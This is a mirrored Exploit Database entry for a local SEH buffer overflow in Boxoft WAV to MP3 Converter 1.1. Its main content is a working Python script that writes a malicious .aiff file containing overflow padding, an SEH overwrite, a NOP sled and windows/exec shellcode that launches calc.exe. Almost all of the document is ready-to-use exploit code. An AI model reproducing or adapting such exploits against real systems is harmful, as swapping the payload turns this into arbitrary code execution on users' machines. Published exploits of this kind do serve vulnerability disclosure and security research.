Boxoft WAV to MP3 Converter 1.1 – Local Buffer Overflow (SEH)

• Exploit Database
• 13 阅读

• 作者： ArminCyber
  日期： 2015-10-14
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38456/

• # Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow
  # Date: 10/13/2015
  # Exploit Author: ArminCyber
  # Contact: Armin.Exploit@gmail.com
  # Version: 1.1
  # Tested on: XP SP3 EN
  # Description: Amalicious .aiff file cause this vulnerability.
  # category: Local Exploit
  
  
  f = open("malicious.aiff", "w")
  
  f.write("A"*4132)
  
  f.write("\xeb\x06\x90\x90")
  
  f.write("\xa4\x43\x40\x00")
  
  # Shelcode:
  # windows/exec - 277 bytes
  # CMD=calc.exe
  f.write("\x90"*20)
  f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
  "\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
  "\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
  "\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
  "\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
  "\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
  "\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
  "\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
  "\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
  "\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
  "\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
  "\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
  "\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
  "\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
  "\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
  "\xc4\xd9")
  f.write("\x90"*20)
  
  f.close()